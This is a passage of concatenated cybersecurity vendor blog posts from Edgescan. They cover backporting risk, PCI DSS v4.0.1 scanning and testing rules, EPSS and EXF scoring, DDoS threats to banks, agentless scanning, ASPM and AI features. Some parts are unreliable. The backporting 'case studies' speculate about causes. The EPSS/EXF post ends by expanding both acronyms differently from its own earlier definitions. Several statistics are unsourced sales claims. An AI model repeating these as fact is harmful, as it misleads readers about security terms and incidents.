is a temporary risk management strategy but should not replace full software upgrades. Organizations must minimize reliance on backporting and prioritize officially supported versions to maintain a strong cybersecurity posture and reduce risk.Many developers and system administrators have varying levels of risk awareness, often prioritizing deadlines, functionality, and performance over security. As a result, security is frequently treated as a secondary concern. To mitigate this, security must be integrated into the Software Development Lifecycle (SDLC) from the outset, following a DevSecOps approach that ensures security is considered alongside functionality and performance.Developing and maintaining secure, updated solutions for complex systems is challenging. However, security is not just an IT issue, it must be a companywide priority. A shared understanding of risk across all teams is essential for leadership to accurately assess the organization’s security posture, staff limitations, and available resources (FTEs). Aligning security priorities with policy, compliance, and business objectives enables organizations to effectively manage risk, meet regulatory requirements, and achieve long-term security goals.Recent Case Studies and ResearchIdentifying specific cybersecurity incidents directly attributed to backporting vulnerabilities is challenging, as organizations often do not disclose detailed internal patch management practices. However, several studies and reports highlight the potential risks associated with backporting:Increased Attack Surface Due to Dependency IssuesCase Study: National Public Data Breach (April 2024)In April 2024, National Public Data (NPD), a company providing background checks, was breached through a third-party contractor who failed to update their security patches. This oversight allowed attackers to steal sensitive personal data, including Social Security numbers and addresses, affecting approximately 2.9 billion individuals.National Public Data Breach (April 2024) - Possibly Related to BackportingCause: Third-party contractor failed to apply security patches.Connection to Backporting:The breach was due to outdated security patches on a third-party system.If the contractor had been using an older system with backported patches, this could have contributed to vulnerabilities.Sources: https://fortifydata.com/blog/third-party-data-breaches-of-2024/?utm_source=chatgpt.comDelayed Response to Emerging ThreatsCase Study: Equifax Data Breach (2017)In 2017, Equifax suffered a significant data breach when attackers exploited an unpatched vulnerability in the Apache Struts framework. Despite the availability of a patch, delays in its application allowed attackers to access sensitive information of approximately 150 million customers.Equifax Data Breach (2017) - Possibly Related to BackportingCause: Unpatched Apache Struts vulnerability (CVE-2017-5638).Connection to Backporting:Equifax failed to apply an official patch in time, but there is no direct mention of backporting.If Equifax had been running an older version of Apache Struts with backported patches instead of upgrading, this could have contributed to the problem.Source: https://tuxcare.com/blog/the-risks-of-delayed-patching-lessons-learned-from-high-profile-cyber-attacks/1. Backporting Vulnerabilities in Web Applications:Study: Research presented at the USENIX Security Symposium examined the challenges of backporting security patches in web applications, particularly focusing on injection vulnerabilities. The study highlighted that improper backporting could introduce new vulnerabilities or fail to fully address existing ones, emphasizing the need for careful analysis and testing during the backporting process.2. Backporting Practices in Package Dependency Networks:Study: An analysis of backporting practices in package dependency networks, published in the IEEE Transactions on Software Engineering, explored how backporting aims to bring bug or vulnerability fixes from newer to older software releases. The study found that while backporting is beneficial for maintaining legacy systems, it requires extensive technical expertise and can introduce new risks if not properly managed.3. Challenges in Backporting Security Fixes:Report: A report by SentinelOne discussed the complexities of backporting, noting that adapting security patches designed for modern systems to older versions can result in unanticipated side effects. The report emphasized that backporting requires extensive technical expertise and may introduce new risks if not properly tested.1. Shi, Z., Luo, L., & Zhang, D. (2022). Challenges in backporting security patches for web applications. Presented at the USENIX Security Symposium. Retrieved from https://www.usenix.org/conference/usenixsecurity22/presentation/shi2. Decan, A., Mens, T., & Gonzalez-Barahona, J. M. (2021). Backporting practices in package dependency networks. IEEE Transactions on Software Engineering. Retrieved from https://decan.lexpage.net/files/TSE-2021.pdf3. SentinelOne. (n.d.). Challenges in backporting security fixes. SentinelOne Cybersecurity Reports. Retrieved from https://www.sentinelone.com/cybersecurity-101/cybersecurity/backporting/ ### Navigating PCI DSS v4.0.1 with Edgescan The transition from PCI DSS v3.2.1 to PCI DSS v4.0 marked a significant shift towards a more proactive approach to payment security. Then PCI DSS v4.0.1 was released on June 11, 2024 to update some requirements and add a glossary of terms. PCI DSS v3.2.1 was retired on March 31st, 2024, but certain requirements for PCI DSS v4.0.1 go into full effect on March 31st, 2025. Today, we will focus on Requirements 6 and 11 of PCI DSS v4.0.1, concerning vulnerability scanning, remediation and penetration testing. First, we will explore the difference between Vulnerability Scanning and Penetration Testing according to PCI DSS v4.0.1, since this can be a point of confusion (no doubt exacerbated by certain vendors marketing “automated penetration testing” services). Vulnerability Scanning vs. Penetration Testing Vulnerability scanning is an automated process to identify potential vulnerabilities in a network or web application. These scans serve as a preliminary step, providing a snapshot of potential security weaknesses that exist within an environment. Vulnerability scanners are tools, and their results need to be validated by humans afterward. Penetration testing, on the other hand, is not a tool. Rather it’s a service performed by experienced professionals. Penetration tests go much deeper than vulnerability scans that rely purely on automation. Defined by the PCI SSC, penetration testing involves a credentialed expert actively attempting to exploit vulnerabilities to determine how an attacker could potentially enter an environment. Penetration testing simulates real-world attack scenarios, to help define an organization’s potential exposure and devise a strategy to remediate these vulnerabilities. Vulnerability scanning is usually the first step when performing a penetration test, but a human is always required to interpret those results. A penetration test is not deemed adequate if it solely focuses on exploiting vulnerabilities identified in a scan. Penetration testers, with their deep knowledge of systems and potential attack strategies, manually probe for weaknesses. Some techniques employed by penetration testers to obtain this extra layer of depth would include fuzzing, injection, forgery tests, and business logic testing (scanners lack the real-world risk context that humans possess). They may use automated tools as part of their toolkit, but the expertise and creative problem-solving of the tester are indispensable since those qualities cannot be automated. For example, if a vulnerability scan identifies a potential weakness in an application server, a penetration tester may use this foothold to launch subsequent attacks that an automated tool would not attempt. By chaining exploits and using the compromised server as a staging point, testers can simulate complex attack paths that an attacker might use, uncovering layers of potential weaknesses that a scan alone would not be able to reveal.Penetration testing also includes the assessment of security monitoring and detection methods. Testers confirm the effectiveness of logging and file integrity monitoring mechanisms, aspects critical to an organization’s ability to detect and respond to an attack. Requirement 6 Security Vulnerability Identification & Risk Ranking: Requirement 6.3.1 mandates that organizations identify new security vulnerabilities using industry-recognized sources and assign risk rankings based on industry best practices. The risk ranking must identify all high-risk and critical vulnerabilities. Regular vulnerability scanning ensures that vulnerabilities are systematically discovered and prioritized for remediation. Protection from Known Vulnerabilities through Patching: Requirement 6.3.3 instructs organizations to install security patches for critical vulnerabilities within one month of release, and other patches must be applied based on a risk assessment following the ranking process defined in 6.3.1. Vulnerability scanning plays a critical role in detecting outdated or unpatched systems, ensuring compliance with this requirement. Protection of Public-Facing Web Applications: Requirement 6.4.1 states that it is essential for public-facing web applications to undergo manual or automated vulnerability assessments at least once every 12 months and after significant changes. Alternatively, organizations can deploy automated solutions such as Web Application Firewalls (WAFs) to detect and prevent web-based attacks. Vulnerability scanning is crucial for meeting this requirement by identifying exploitable weaknesses in web applications. Verification of PCI DSS Controls After Significant Changes: Following significant changes to system components, requirement 6.5.2 organizations must verify that all applicable PCI DSS requirements remain in place and update documentation accordingly. Vulnerability scanning ensures that newly introduced or modified systems are not left exposed to security threats after major updates or infrastructure changes. Requirement 11 Quarterly Vulnerability Scanning: Under requirement 11.3.2, organizations are required to conduct vulnerability scans quarterly by a PCI SSC Approved Scanning Vendor (ASV). This adjustment emphasizes the importance of identifying vulnerabilities but also resolving them following the ASV Program Guide’s standards. While only quarterly scans are required, it’s encouraged to scan after significant changes to infrastructure or applications, such as adding new network devices or pushing deployments to production. Annual Penetration Testing on Cardholder Data Environments (CDEs): The updated requirements, 11.4.2 and 11.4.3, mandate an annual penetration test on both internal and external CDEs. This requirement also mandates penetration tests following significant changes to infrastructure or applications. Verification of Remediation and Risk-Based Approach: The new standard requires retesting to verify the effectiveness of corrective actions (11.4.4). In doing so, PCI DSS v4.0.1 also advocates for a risk-based approach to prioritizing remediation efforts. Segmentation Controls and Multi-Tenant Service Providers: Requirement 11.4.5 necessitates testing segmentation controls annually or after any changes, critical for isolating the cardholder data environment (CDE). For multi-tenant service providers, the new standards (11.4.6) call for validating logical separation controls biannually with a penetration test. Another set of biannual penetration tests is required (A.1.1.4) for multi-tenant service providers to determine adequate separation between customers in their environment. Requirement 11.4.7 increases the emphasis on multi-tenant service providers to assist customers with their external penetration tests. Edgescan Can Fulfill PCI DSS V4.0.1 Requirements Risk rating is a key part of requirement 6. The Edgescan platform displays risk ratings for every vulnerability according to EPSS (Exploit Prediction Scoring System), CISA (Cybersecurity and Infrastructure Security Agency) KEV (Known Exploited Vulnerability), CVSS (Common Vulnerability Scoring System) and asset criticality to ensure that you are properly triaging PCI failing vulnerabilities in the context of your organization. Edgescan is recognized as a PCI Approved Scanning Vendor (ASV) and offers an integrated platform where organizations can manage both their penetration testing findings and vulnerability scanning results. Consolidating these functions allows for a more efficient and holistic approach to maintaining PCI DSS v4.0.1 compliance. The Edgescan platform only shows validated vulnerabilities, which means no false positives in Edgescan’s scanning results. On average, not having to validate false positives saves organizations’ security teams a few hours every week. In the context of quarterly vulnerability scans for PCI compliance, this is valuable. Organizations can be sure that all PCI failing vulnerabilities have been validated as true positives. Edgescan offers unlimited, no-charge retesting on any penetration testing finding. This ensures that any remediation efforts are verified effectively and requirement 11.4.4 is satisfied without the financial strain associated with paying traditional penetration testing vendors for retesting. The transition to PCI DSS v4.0.1 will significantly impact how organizations approach vulnerability scanning and penetration testing. Edgescan’s PCI compliance program utilizes a risk-based approach and unlimited, no-charge retesting on penetration testing findings to deliver simple but affordable PCI DSS v4.0.1 compliance. Book time with Edgescan References Requirements and Testing Procedures Version 4.0.1 Summary of Changes from PCI DSS Version 3.2.1 to 4.0 Summary of Changes from PCI DSS Version 4.0 to 4.0.1 Information Supplement: Penetration Testing Guidance ### EPSS and EXF: Advancing Risk-Based Vulnerability Management How Edgescan's integrated scoring systems deliver actionable intelligence for ransomware defense and strategic remediationEdgescan leverages the Exploit Prediction Scoring System (EPSS) and its proprietary Edgescan eXposure Factor (EXF) to deliver significant value to its clients by prioritizing vulnerability remediation and enhancing overall security posture. This approach is particularly effective in addressing ransomware-related vulnerabilities.EPSS and EXF IntegrationThe EPSS is a data-driven model that estimates the likelihood of a software vulnerability being exploited in the wild. It generates a probability score ranging from 0 to 1, with higher scores indicating a greater likelihood of exploitation. By incorporating EPSS, Edgescan can prioritize vulnerabilities based on their potential for exploitation rather than solely on their severity.The EXF, on the other hand, is a comprehensive scoring system developed by Edgescan. It combines data from EPSS, the Common Vulnerability Scoring System (CVSS), and the Cybersecurity and Infrastructure Security Agency's Known Exploited Vulnerabilities (CISA KEV) catalog. This integration allows EXF to provide a unified score ranging from 0 to 100, indicating the risk level of each vulnerability. A higher EXF score signifies a greater risk, helping organizations focus on the most critical threats.Validation ProcessAt Edgescan, our validation methodology sets the industry standard for vulnerability accuracy. Our advanced continuous testing platform combines enterprise-grade scanning technology with expert manual penetration testing and validation. This full-stack approach eliminates false positives and provides customers with an exact, real-time view of their security posture. The validated findings directly inform our EXF scoring, ensuring precise risk quantification and actionable intelligence.Delivering Strategic ValueThe integration of EPSS predictive modeling and our proprietary EXF scoring empowers organizations to implement data-driven remediation strategies. This is particularly crucial for security teams managing extensive vulnerability backlogs with finite resources. By focusing remediation efforts on vulnerabilities that present the highest likelihood of exploitation and business impact, organizations can significantly reduce their mean time to remediation (MTTR) and strengthen their security foundation.Ransomware Vulnerability IntelligenceModern ransomware campaigns actively target known vulnerabilities across the attack surface. Edgescan's platform provides deep visibility into ransomware-exploitable vulnerabilities through advanced threat correlation. By combining EPSS exploitation probability data with EXF risk scoring, organizations can identify and prioritize vulnerabilities that align with current ransomware TTPs (Tactics, Techniques, and Procedures).Our correlation engine maps vulnerabilities against multiple threat intelligence sources, including the CISA KEV catalog, to provide context-aware risk scoring. When a vulnerability demonstrates high EPSS metrics and appears in authoritative threat feeds, the EXF score reflects this elevated risk profile, enabling rapid response prioritization. This intelligence-driven approach optimizes security resources while providing focused protection against ransomware threats.The recent expansion of the CISA KEV catalog, including critical vulnerabilities CVE-2024-9463 and CVE-2024-9465, underscores the evolving threat landscape. Edgescan's integrated EPSS and EXF scoring ensures organizations maintain resilient security postures through precise vulnerability intelligence and risk-based remediation.Edgescan's integration of the Exploitability and Prevalence Security Score (EPSS) and the Exploit Framework (EXF), along with thorough validation, equips clients with an effective tool for prioritizing and addressing vulnerabilities. This approach is especially efficient in mitigating threats related to ransomware, providing significant value by strengthening security and lowering the risk of exploitation. ### Dutch Central Bank Issues Warning: The Rising Threat of DDoS Attacks on Financial Infrastructure In a significant development highlighting the growing cybersecurity concerns in the financial sector, the Dutch Central Bank has issued an unprecedented warning to citizens, advising them to consider keeping cash reserves at home. This warning comes amid escalating geopolitical tensions between East and West, substantially increasing the risk of cyber attacks against digital services. The Rising Threat LandscapeThe frequency and sophistication of cyber attacks targeting financial institutions have seen a dramatic 50% increase since 2023. Of particular concern are hyper-volumetric Distributed Denial of Service (DDoS) attacks, which can overwhelm banking systems and disrupt essential financial services including:Payment processing systemsCard payment networksBanking transaction systemsATM networks Understanding Modern DDoS AttacksToday's DDoS attacks have evolved significantly in both scale and complexity. These attacks can generate traffic volumes of up to 1 billion packets per second. This massive traffic volume can overwhelm even sophisticated defense systems, potentially disrupting services for hours or days. The IoT ConnectionA particularly concerning aspect of modern DDoS attacks is the exploitation of Internet of Things (IoT) devices. Common household smart devices - from refrigerators to washing machines - can be hijacked without their owners' knowledge and incorporated into botnets for these attacks. This vast network of compromised devices gives attackers substantial computing power to launch devastating attacks. Accessibility of Attack ToolsThe barrier to entry for launching these attacks has decreased significantly. DDoS-for-hire services are available on the dark web for as little as $10 per hour, making these attacks accessible to various threat actors, from cybercriminals to nation-state operators and hacktivists. Regulatory ResponseThe European Union has responded to these threats with the Digital Operational Resilience Act (DORA), which mandates stronger cybersecurity measures for financial institutions. This legislation ensures that organizations are better prepared to detect, prevent, and recover from such attacks. Practical RecommendationsWhile the Dutch Central Bank's warning is a big deal, it is important to maintain perspective. The recommendation is not to withdraw large sums but to keep modest amounts of cash (approximately a few hundred euros) available for essential purchases in case of temporary service disruptions. Looking AheadWhile financial institutions continue to strengthen their cybersecurity defenses, the probability of successful attacks disrupting banking infrastructure is higher than ever before. Organizations must remain vigilant and invest in robust security measures to protect against these evolving threats.What now? Don't panic but be prepared. Maintaining basic contingency plans—including modest cash reserves—is a prudent approach to managing potential risks in our increasingly connected world as we continue to rely more heavily on digital financial services. ### What Makes Edgescan Stand Out? Key Insights from Gartner Peer Reviews Edgescan, a prominent player in the cybersecurity landscape, has garnered significant attention and praise on Gartner Peer Insights. This platform, which aggregates reviews and ratings from verified users, provides a comprehensive view of how Edgescan performs in real-world applications. Here’s an in-depth look at how Edgescan scores and what makes it stand out in the cybersecurity domain. Overview of EdgescanEdgescan is a comprehensive Continuous Threat Exposure Management (CTEM) solution that integrates several critical cybersecurity functions, including External Attack Surface Management (EASM), Vulnerability Management (VM), Application Security Testing (AST), API Security Testing, and Penetration Testing as a Service (PTaaS). This integration allows organizations to manage and mitigate security risks effectively, combining automated cyber analytics with human validation to minimize false positives and prioritize critical vulnerabilities[1]. Ratings and ReviewsOn Gartner Peer Insights, Edgescan has received an impressive overall rating of 4.7 out of 5 stars, based on 54 reviews[1]. This high rating reflects the platform’s robust capabilities and the satisfaction of its users. The reviews highlight several key aspects of Edgescan’s performance:Customer Experience: Edgescan scores highly in customer experience, with users praising its outstanding customer service and dedicated account management. The platform’s ability to provide tailored security reporting and manual review of results ensures that users receive meaningful and actionable insights[1].Integration and Deployment: Users have rated Edgescan’s integration and deployment capabilities at 4.8 out of 5. This high score indicates that the platform is easy to implement and integrates seamlessly with existing systems. The ease of deployment and administration is a significant advantage for organizations looking to enhance their security posture without extensive overhead[1].Service and Support: Edgescan’s service and support are also highly rated, with a score of 4.8. Users appreciate the platform’s responsive support team and the comprehensive assistance provided during and after onboarding[1].Product Capabilities: The platform’s product capabilities receive a rating of 4.7, reflecting its effectiveness in identifying and mitigating security vulnerabilities. The combination of automated scanning and manual validation ensures high accuracy and minimal false positives[1]. Key StrengthsSeveral strengths make Edgescan a preferred choice among cybersecurity professionals:Manual Review and Custom Reporting: One of Edgescan’s standout features is its manual review process, which significantly reduces false positives. This process, combined with customizable reporting, allows organizations to focus on the most critical vulnerabilities and streamline their remediation efforts[1].Scalability and Flexibility: Edgescan is praised for its scalability and flexibility, making it suitable for organizations of various sizes and industries. Whether a small business or a large enterprise, Edgescan can adapt to meet specific security needs[1].Comprehensive Security Coverage: By integrating multiple security functions into a single platform, Edgescan provides comprehensive coverage that addresses a wide range of security threats. This holistic approach simplifies vulnerability management and enhances overall security posture[1]. ConclusionEdgescan’s high scores on Gartner Peer Insights reflect its effectiveness and reliability as a cybersecurity solution. The platform’s strong customer service, ease of integration, and robust product capabilities make it a valuable asset for organizations seeking to enhance their security measures. With its focus on reducing false positives and providing actionable insights, Edgescan stands out as a leader in the cybersecurity field, helping organizations protect their digital assets in an increasingly complex threat landscape.References[1]: Edgescan Reviews, Ratings & Features 2024 | Gartner Peer Insights ### The Legacy Challenge of False Positives in Vulnerability and Exposure Detection After discussing CTEM (Continuous Threat and Exposure Management) and ASPM (Application Security Posture Management) recently with some noted industry analysts, the majority stated their clients are faced with the same challenges year on year which still have not been solved.As the cyber industry pushes ahead, issues like accuracy appear to be ignored by the market as they appear too complex to solve. Edgescan has attempted to solve this issue over the past 5 years by building a data lake of triaged vulnerabilities and using a combination of clever technology and data science to automate validation of vulnerabilities. Our approach has resulted in near false positive-free vulnerability intelligence with approximately only 8% of discovered vulnerabilities requiring manual inspection by our team.Reasons for false positivesDespite advancements, vulnerability scanners can still produce false positives (flagging non-issues as threats). Automated scanning accuracy remains a significant challenge in cybersecurity. Here are a few reasons why:Complex Environments: Modern IT environments are highly complex with a mix of on-premises, cloud, and hybrid systems. Ensuring accurate scans across these diverse environments is challenging, and most point-and-click solutions do not provide the coverage required to help ensure adequate coverage is achieved.Configuration Issues: Incorrectly configured scanners can miss vulnerabilities (false negatives) or generate inaccurate results (false positives). Regularly fine-tuning and updating scanning configurations is a key component that is commonly overlooked and takes effort.Ecosystem Integration: Ensuring that vulnerability scanners integrate seamlessly with other security tools and processes can affect accuracy. Poor integration can lead to gaps in coverage and missed vulnerabilities. “Wiring” separate tools together is never as simple as it may appear.The impact of inaccuracy cannot be underestimated, and if addressed, significantly improves efficiency and reduces friction in any vulnerability management or CTEM process.False positives impact organisations in a number of ways, detailed below. It's worth considering how you are addressing this elephant in the room…Resource Drain: Security teams spend valuable time and effort investigating and remediating non-existent vulnerabilities. This not only wastes resources but also diverts attention from improving security posture. Resource drain also leaks into development teams' capacity undermining trust and the value cyber security teams deliver to development.Alert Fatigue: Constantly dealing with false positives can lead to "alert fatigue." Alert fatigue is where security professionals (and possibly developers) become desensitized to alerts. Think, “the boy who cried wolf.” This increases the risk of genuine threats being overlooked due to a continuous deluge of noise. Vulnerability validation suppresses “noise.”Operational Disruption: False positives can disrupt daily operations, forcing developers and security teams to halt their regular tasks to address these misleading alerts. Development is all about developing new products. Being faced with false positives wastes time, distracts from real issues, undermines trust, generates unneeded noise, and is generally a negative disruptor.Reduced Efficiency: The need to manually review each false positive can slow down automated processes and reduce overall efficiency. The requirement to review every output from a continuous exposure/posture management pipeline goes against the flow of such a system and introduces friction.Impact on Morale: Continuous and persistent false positives can lead to frustration and decreased motivation among security team and product development members, affecting team advancement and overall productivity.Prioritization: It is pointless to apply priority meta-data to vulnerability intelligence if it contains errors and false positives. It simply amplifies the issue and makes the problem worse, raising the alarm needlessly for non-issues. ### Why CTEM is Better Than Traditional Penetration Testing: A Humorous Take In the world of cybersecurity, the debate between Continuous Threat Exposure Management (CTEM) and traditional penetration testing is like comparing a high-tech drone to a trusty old bicycle. Sure, the bicycle has its charm, but the drone is just so much cooler and more efficient! First off, let’s talk about the frequency. Traditional penetration testing is like that annual dentist visit – you know you need it, but you dread it, and it only happens once in a blue moon. CTEM, on the other hand, is like having a personal trainer who’s with you every step of the way, making sure you’re always in tip-top shape. With CTEM, you get continuous monitoring and real-time intelligence, so you’re never caught off guard by a cyber threat or exposure. Organisations that use CTEM report a 30% drop in cyber incidents due to its continuous nature in terms of assessment and visibility. Now, imagine traditional penetration testing as a surprise pub quiz. It’s stressful, demanding and you only find out what you didn’t know after the fact, after the quiz is over. CTEM, however, is like having the answers to the test beforehand. It provides ongoing assessments and helps you address, validate and prioritise vulnerabilities before they become a problem. We see a reduction in remediation time of up to 55% when a CTEM approach is applied.  Then there’s the dynamism and adaptability factor; Traditional penetration testing is a bit like using a map from the 1800s to navigate modern-day Dublin – it’s outdated and static. It was correct one but is a point-in-time view and doesn’t account for the ever-changing landscape. CTEM, in contrast, is like having a GPS that updates in real-time, guiding you through the twists and turns of the cybersecurity world with ease.  And let’s not forget the cost. Traditional penetration testing can be a bit like buying a fancy suit you’ll only wear once or twice a year. CTEM, however, is more like investing in a wardrobe that keeps you looking sharp all year round. It’s cost-effective, reduces the resources required to maintain a robust posture and provides ongoing value. I’ve seen companies reduce overall security costs by up to 50% by implementing CTEM.  In conclusion, while traditional penetration testing has its place, CTEM is the way forward. It’s continuous, adaptable, and cost-effective – and let’s face it, who wouldn’t want a personal trainer for their cybersecurity? So, hop on the CTEM bandwagon and leave those outdated methods in the dust, reduce cost and improve security posture. What’s not to like?   Finally… What’s the difference between CTEM and ASPM (Application Security Posture Management)?  Key Differences Scope: CTEM covers a broader range of security postures, including networks, endpoints, and cloud environments, while ASPM is specifically focused on application security.  Lifecycle: CTEM is a continuous process that spans the entire organisation’s security landscape, whereas ASPM is centred around the application lifecycle.  Integration: ASPM integrates security into the SDLC, ensuring that applications are secure from the ground up. CTEM differs as it continuously monitors and manages threats across all aspects of the organisation’s infrastructure. In summary, while both CTEM and ASPM are essential for a robust cybersecurity strategy, they serve different purposes. CTEM provides a holistic approach to managing threats across the entire organisation, whereas ASPM ensures that applications are secure throughout their lifecycle. Together, they form a comprehensive defence against the ever-evolving landscape of cyber threats. Edgescan provides both due to its full stack approach; deep Web application and API assessments coupled with endpoint, cloud and network exposure management continuously.  ### Special Agent Agentless CIA – Can I really trust Agents? I received interesting feedback on some prospect calls over the last few weeks when discussing internal vulnerability scanning.Customer:  "How do Edgescan do internal scanning?"Edgescan:  "We use an agentless approach using a lightweight virtual appliance."Customer:  "Great, I don’t want to end up like a crowdstrike customer."The fall out from the recent Crowdstrike issue has IT sysadmins reviewing not only disaster recovery plans but also every piece of vendor installed technology across their organization. When selecting a tool or service to conduct internal scanning and testing it is important to understand resource constraints, what tools you already have pre-installed or available and what you expect/want the vulnerability testing to achieve. At Edgescan we have always had the belief that an agentless approach is superior and most of our clients agree but let’s take a quick look at why we believe agentless is best.First what’s the difference?Agentless scanning provides visibility into the threats in your environments, without the need to install software-driven agents. In our approach the appliance acts as a secure landing point from our cloud-based SaaS to facilitate the VPN tunnelling of scan traffic.Agent-based scanning is more traditional and involves deploying components on each of the hosts or targets that are to be tested. It is a common approach for air gapped networks or organizations not open to SaaS technologies as it keeps all data in house. (cough, cough)What are the advantages of each with regard to continuous vulnerability scanning and penetration testing?Agent advantagesVulnerability data is kept in house (local storage), for sensitive air gaped clients that don’t wish to send data to the cloud. (Just remember, your installed software still needs to call home somehow to get updates, unless your still doing updates with a floppy disk or CD. In which case you should look to upgrade from the 1990s).Because Agents are more traditional, they are sometimes better understood and sometimes align to more traditional expectations. ie they can feel familiar. (I'm not sure if CrowdStrike customers share this sentiment).Agents can be an active logger and with the right permissions can change policies and make config changes. (This can however be seen as out of scope for a VM tool, most clients in my experience don’t like to have attack and defence in one solution)Agents can operate independently and usually don’t require a central control point. This means they can be deployed onto devices without consistent connectivity such as WFH laptops. (How many WFH laptops in a modern organization are not built to a specific standard with permissions correctly enforced?) In reality, the practical utility here is minimal.Agents can run in real time and stop threats as they happen. (This is a bit of a sales pitch; good security is proactive not reactive. Find the issue and address it, well before it ever becomes an issue). Agentless AdvantagesAn established egress VPN connection.  This allows our penetration testing team to connect to internal resources and validate vulnerabilities which maintains the Edgescan unique offering, near false positive free vulnerability intelligence. It also allows our testing team to conduct penetration testing against any type of asset remotely.No resource requirements. Both machine and human Our appliance runs on a machine with 1gb of RAM and has a minimal attack surface. In contrast a comprised agent could have unfettered access to a machine and be devastating.Zero maintenance.  No updates or config is required as Edgescan is still utilizing the same technology stack used for all assets both internal and external. With the established connection Edgescan handles any required updates.Easy deployment.  Install the image into your chosen hypervisor (on-prem or cloud) add in one firewall rule and you’re done. Edgescan starts discovery and testing. Segregated network based on geo lock? (easy, use 2,3 or 10 appliances, easier than 150,000 agents)Authenticated scans.  There are some mis-conceptions that agents are required for auth scanning. Authentication is configured in the scanning technology. Having cloud-based visibility in this regard means Edgescan will notify clients automatically if there is a problem with authentication.Scalability.  Again, as your network grows there is no need to install anything. Just add the target to Edgescan or let it collect it automatically.No 3rd party updates...  that turn your PCs into bricks.In summary, Agents are becoming a legacy product. The value gotten from them is minimal and is quickly being fulfilled by preinstalled solutions such as MS defender. Agentless solutions provide so many advantages with little drawbacks. As we move towards DORA and the harder enforcement of compliance in general, do you really have time to waste installing and maintaining agents while trying to run continual testing along with the 1000 other tasks that need to be performed? ### Edgescan and ASPM (Application Security Posture Management) Application Security Posture Management (ASPM) continuously assesses, manages, and enhances application security throughout the software development lifecycle, integrating various security approaches.Below are typical Key Outputs from any ASPM solution and how Edgescan maps and surpasses such requirements. Key Outputs Any ASPM Solution Should Deliver Vulnerability Reports: Detailed reports on identified vulnerabilities, including their severity, potential impact, and recommended remediation steps.Edgescan provides such metrics and more such as attack surface, SLA violations, MTTR, Prioritization and potential training recommendations which may prevent such vulnerabilities from being introduced in the first place.Compliance Reports: Assessments of how well applications adhere to security policies and regulatory requirements.Edgescan provides PCI-DSS, CISA, CIS compliance mapping. Edgescan’s AI insights also maps discovered vulnerabilities to compliance standards such to frame how the vulnerability will impact compliance efforts.Risk Scores: Quantitative scores that represent the overall security risk of an application based on identified vulnerabilities and their potential impact.Edgescan provides both breach and risk metrics to easily help prioritize remediation efforts such as EPSS, CISA KEV, CVSS, and EXF.Security Posture Dashboards: Visual dashboards that provide an at-a-glance view of the security status of all applications within the organization.Edgescan provides “Asset Risk” metrics highlighting full stack security posture information to help focus on assets with most severe exposures. Key Metrics Any ASPM Solution Should Deliver Number of Vulnerabilities: The total count of vulnerabilities identified in the application, business unit or geography. Tagging of assets and application of contextual metadata to aid filtering and reporting.✓  Feature in EdgescanVulnerability Severity: Classification of vulnerabilities based on their severity (e.g., critical, high, medium, low). Severity can be judged not only by the vulnerability type but by its exploitability and breach probability.✓  Feature in EdgescanTime to Remediation: The average time taken to fix identified vulnerabilities. By virtue of date discovered and date closed via on demand retesting to verify the vulnerability has been mitigated. Also self-imposed SLA’s to keep track of MTTR and address severe exposures fast!✓  Feature in EdgescanCompliance Score: A metric indicating the degree to which applications comply with security policies and standards. Edgescan uses our AI Insights to achieve compliance mapping. This keep pace with both the every changing vulnerability taxonomy and compliance requirements.✓  Feature in EdgescanRisk Exposure: The potential risk exposure based on the identified vulnerabilities and their severity. As above, breach predictability and public knowledge of breach attempts or ransomware leveraging a specific vulnerability can be gleamed via the edgescan platform.✓  Feature in EdgescanPatch Management Efficiency: Metrics related to the efficiency and timeliness of applying security patches. Self-imposed SLA’ trackers can notify and alert the occurrence of exposures not being attended to in a timely manner.✓  Feature in EdgescanSecurity Posture Trends: Trends over time showing improvements or declines in the security posture of applications. Dashboard metrics and reporting demonstrating risk posture, improvements or otherwise. AI Insights providing more context in terms of MTTR, priority and compliance issues.✓  Feature in EdgescanThe outputs and metrics above help organizations maintain a strong security posture by providing continuous visibility into the security status of their networks, API’s & applications and enabling proactive management of security. Don’t disregard continuous landscape visibility with ASM in order to help ensure all assets are under management by the ASPM solution. ### AI Insights: The Cyber Remediation Force Multiplier Cyber threats are growing in sophistication and volume, making it increasingly difficult to prioritize vulnerabilities, maintain compliance, and ensure the safety of digital assets.The traditional methods of handling these risks are no longer sufficient - AI Insights is a feature designed to provide targeted and actionable intelligence, empowering security staff to make informed, strategic decisions faster than ever.AI Insights takes non-identifiable customer metadata, combines it with predefined questions, instructions and guardrails and feeds it into an AI model that produces in-depth, actionable security insights. This technique lets Edgescan leverage your specific data to generate tailored Insights, offering a unique perspective on your organization's security posture.Here’s a look at some of the categories of Insight that we can produce:Anomaly Detection: By analyzing patterns in your data, AI Insights can flag deviations from typical behavior - for example previously repaired vulnerabilities resurfacing or assets becoming blocked due to configuration/licencing issues.Trend Identification: Looking beyond singular events, we can identify long-term trends in your security data—whether it’s the rise of new vulnerability types or shifting patterns in attempted attacks.Categorization and Prioritization: The ability to classify data into distinct categories (for example, using a prioritization methodology like Stakeholder-Specific Vulnerability Categorization (SSVC)) and prioritize based on criticality. This can allow organizations to tackle the most dangerous threats first.Natural Language Summaries: Often, cybersecurity insights are filled with dense technical jargon. AI Insights can distill these details into natural language, making complex security data comprehensible to both technical teams and decision-makers.Predictive Capabilities: Leveraging historical data, AI Insights can predict the time it typically takes to remediate certain vulnerabilities or identify cyclical issues, such as configurations that frequently lead to expired credentials or outdated software.Checking for Exploit Code: The platform can go beyond just identifying vulnerabilities - by assessing whether known exploits are available in the wild, adding a critical extra layer of confidence in you remediation approach.Outlier Detection: By filtering through mountains of data, AI Insights can pinpoint outlying data points that may represent either a significant security risk or an opportunity for optimization. An example here would be where one of a set of assets that previously had a similar attack surface starts to deviate from the others.Recommendations: Given your organizational security weak spots, Insights can make some recommendations - areas to target for training in your team or areas of concern in terms of certification compliance for example.Strategic Guidance: AI Insights can bridge the gap between technical findings and high-level strategies by converting detailed security data into actionable steps thus aligning technical actions with business goals.AI Insights is more than just a feature – it's a force multiplier for modern cybersecurity teams. They help organizations to stay ahead of the curve. As the digital landscape continues to evolve, so too must the strategies we use to protect our organizations. AI Insights is the next step in proactive, intelligent threat management. ### The Intersection of Astrophotography and Cybersecurity: Protecting Your Gear, Software, and Data Astrophotography depends on advanced technology like high-end cameras, telescopes, and image-processing software. But with that reliance comes a common yet often overlooked risk: cybersecurity vulnerabilities.In the rush to capture celestial wonders, it's easy to forget that the smart devices and software we use to enhance our photography are also susceptible to cyberattacks. As astrophotography becomes more interconnected (especially through internet-enabled equipment, cloud services, and automation) photographers should be mindful of the cybersecurity risks involved. Let's look at how 